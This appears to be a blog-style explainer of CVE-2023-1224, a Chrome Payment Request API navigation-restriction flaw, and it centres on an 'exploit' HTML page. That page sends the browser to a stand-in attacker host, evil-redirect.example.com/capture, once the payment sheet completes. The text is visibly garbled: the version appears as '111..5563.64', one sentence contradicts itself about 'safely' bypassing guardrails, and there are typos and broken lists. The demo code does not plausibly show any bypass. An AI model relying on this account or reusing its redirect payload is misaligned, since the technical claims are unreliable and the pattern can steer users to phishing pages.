---
In early 2023, security researchers and developers became aware of CVE-2023-1224: an insufficient policy enforcement flaw in the Web Payments API of Google Chrome. Before version 111..5563.64, this vulnerability let a remote attacker beat navigation restrictions through crafty HTML. While the official Chromium severity was tagged “Medium,” understanding how it actually happened and what it meant for real users is vital. This article explains it all—in plain language—with code, references, and an easy-to-follow exploit example.
What Is the Web Payments API?
The Web Payments API is a set of browser features that help web apps request payment information (like credit cards, contact info, or shipping addresses) directly from the browser—not via forms. Chrome heavily promotes this API for seamless, “one-click” checkout flows.
What Went Wrong in Chrome?
To avoid abuse, Chrome usually restricts pop-ups, redirects, or navigation changes that aren’t triggered by a user action. These restrictions exist to stop malicious sites from hijacking browser sessions with sneaky redirects or unwanted pop-ups.
But before Chrome 111..5563.64, calling the Payment Request API in a creative way let attackers skirt these rules—bypassing navigation restrictions and even redirecting users safely through Chrome’s guardrails.
Victim visits attacker’s web page.
2. The page abuses the Payment Request API. Instead of just showing a payment dialog, it sneaks in a navigation (redirect or pop-up) as part of the payment “completion” step.
Exploit HTML Example
<!DOCTYPE html>
<html>
<head>
<title>Payment API Exploit Demo</title>
</head>
<body>
<button id="pay-btn">Start Payment</button>
<script>
// Fake payment details
const paymentDetails = {
total: {
label: "Total",
amount: { currency: "USD", value: "1.00" }
}
};
const paymentMethods = [
{
supportedMethods: "basic-card",
data: {
supportedNetworks: ["visa", "mastercard"]
}
}
];
function doExploit() {
if (!window.PaymentRequest) {
alert("PaymentRequest API not supported!");
return;
}
// Create the payment request
const request = new PaymentRequest(paymentMethods, paymentDetails);
// Show the payment sheet
request.show().then(paymentResponse => {
// Trick: Instead of just completing the payment
// Do a navigation (simulate malicious intent)
window.location.href = "https://evil-redirect.example.com/capture";;
// Complete payment (though usually won't be reached)
paymentResponse.complete('success');
}).catch(err => {
console.log("Payment cancelled or failed:", err);
});
}
document.getElementById('pay-btn').onclick = doExploit;
</script>
</body>
</html>
How this works:
When a user clicks the “Start Payment” button, a normal payment sheet opens.
- As soon as the payment interaction is supposed to finish, the attacker injects a window.location.href change—navigating the whole browser to a malicious domain.
Why Is This Dangerous?
- Phishing and Data Theft: Attackers could send you from a legitimate checkout to a very convincing fake payment site.
- Breaking User Flow: Users lose trust if their browser navigates unexpectedly, especially during payments.
- Potential for Multi-Step Attacks: By chaining this with other vulnerabilities, bad actors could perform more damaging exploits.
Fix and References
Google patched CVE-2023-1224 in Chrome 111..5563.64 (see the release notes). The fix tightens policy enforcement so that Payment Request completion can’t secretly trigger unauthorized navigation.
Key Links
- CVE-2023-1224 at NIST NVD
- Chromium Issue Tracker reference (may have restricted access)
- Official Chrome Release Blog (March 2023)
- Payment Request API MDN Docs
Can You Still Be Affected?
Any user on Chrome before 111..5563.64 is at risk if they visit a malicious page. Always keep your browser up to date. Web developers, too, should avoid attempting creative navigations or redirects at payments—design for user security.
Final Thoughts
CVE-2023-1224 is a classic case of “death by a thousand missed policies.” Even strong features like the Payment Request API must be constantly reviewed for edge cases, especially as web security grows ever more complex. Keep your tools patched, be aware of the latest threats, and know that even Medim-severity bugs can have big real-world impacts.
*Written exclusively for curious developers, bug hunters, and anyone who wants to understand Chrome browser risks—with real-world code and research links only found here.*
Timeline
Published on: 03/07/2023 22:15:00 UTC
Last modified on: 03/11/2023 02:38:00 UTC